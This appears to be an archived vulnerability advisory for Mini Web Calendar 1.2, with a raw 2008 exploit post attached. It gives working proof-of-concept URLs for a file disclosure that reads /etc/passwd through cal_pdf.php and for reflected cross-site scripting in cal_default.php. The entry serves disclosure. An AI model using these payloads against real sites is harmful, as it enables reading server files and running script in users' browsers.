XSS / FD Vulnerability

vendor:

Mini Web Calendar

by:

ahmadbady

7.5

CVSS

HIGH

Cross-Site Scripting (XSS) and File Disclosure (FD)

CWE

Product Name: Mini Web Calendar

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:smolinari:mini_web_calendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

A vulnerability exists in Mini Web Calendar, ver. 1.2, which allows an attacker to perform Cross-Site Scripting (XSS) and File Disclosure (FD) attacks. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary HTML and script code in the context of the affected application or to disclose sensitive information from the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the application.

Source

Exploit-DB raw data:

************************(XSS / FD Vulnerability)**************

script:Mini Web Calendar, ver. 1.2
   
   
************************************************************************************************************
download from:http://www.smolinari.com/srm/download/mwcal/mwcal.zip?PHPSESSID=84ivc1h7ohn8f9ra7cgn66fj94
   
************************************************************************************************************


......................................................................................
local file xpl:
   
http://www.site.com/mwcal/php/cal_pdf.php?thefile=/etc/passwd

xss xpl:

http://www.site.com/mwcal/php/cal_default.php/>'><ScRiPt>alert(0)</ScRiPt>



***************************************************
***************************************************

Author: ahmadbady from http://www.deltahacking.net

my mail: kivi_hacker666@yahoo.com


***************************************************

# milw0rm.com [2008-11-07]